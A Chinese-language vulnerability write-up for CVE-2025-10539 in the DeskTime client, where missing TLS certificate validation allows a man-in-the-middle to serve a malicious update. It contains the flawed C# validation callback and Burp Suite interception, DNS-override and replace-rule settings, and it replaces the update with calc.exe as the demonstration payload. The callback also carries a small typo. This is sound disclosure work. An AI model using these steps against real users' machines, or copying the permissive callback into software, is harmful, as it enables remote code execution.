# 漏洞总结:Missing TLS Certificate Validation leading to RCE (CVE-2025-10539) ## 漏洞概述 **CVE-2025-10539**:由于缺失 TLS 证书验证,攻击者可以注入到客户端与 DeskTime 更新服务器之间的网络路径中,通过返回恶意可执行文件响应更新请求,从而在客户端实现用户级代码执行(RCE)。 ## 影响范围 - **受影响版本**:1.3.671(测试时的最新版本) - **触发条件**:更新程序每小时自动触发,无需用户交互 ## 修复方案 - **修复版本**:v1.3.674 - **发布日期**:2026-04-28 - **下载地址**:https://desktime.com/download ## 概念验证 (POC) ### 1. 证书验证代码片段 ```csharp // Certificate validation private bool CheckCertificate(object sender, X509Certificate certificate, X509Chain chain, SslPolicyErrors sslPolicyErrors) { if (sslPolicyErrors == SslPolicyErrors.None) return true; if (sslPolicyErrors == SslPolicyErrors.RemoteCertificateChainErrors) { // Check if the certificate is valid for the hostname if (chain.ChainStatus.Length == 1 && chain.ChainStatus[0].Status == X50ChainStatus.UntrustedRoot) return true; } return false; } ``` ### 2. Burp Suite 监听器设置 ``` Redirect to host: desktime.com Redirect to port: 443 ☑ Force use of TLS ☑ Support invisible proxying (enable only if needed) ``` ### 3. Burp DNS 覆盖设置 ``` Hostname: desktime.com IP Address: 127.0.0.1 ``` ### 4. 更新请求示例 ```http GET /api/v1/updates?version=1.3.671&os=windows&arch=x64&user_id=xxx HTTP/1.1 Host: desktime.com Accept-Encoding: gzip, deflate, br Connection: Close ``` ### 5. 更新响应示例 ```json { "version": "1.3.674", "url": "https://desktime.com/updates/win/update.exe" } ``` ### 6. Burp 替换规则 ``` Match: "version":"1.3.671" Replace: "version":"1.3.674" ``` ### 7. 恶意更新文件 将 `calc.exe` 替换为更新程序,当客户端检查更新时自动执行。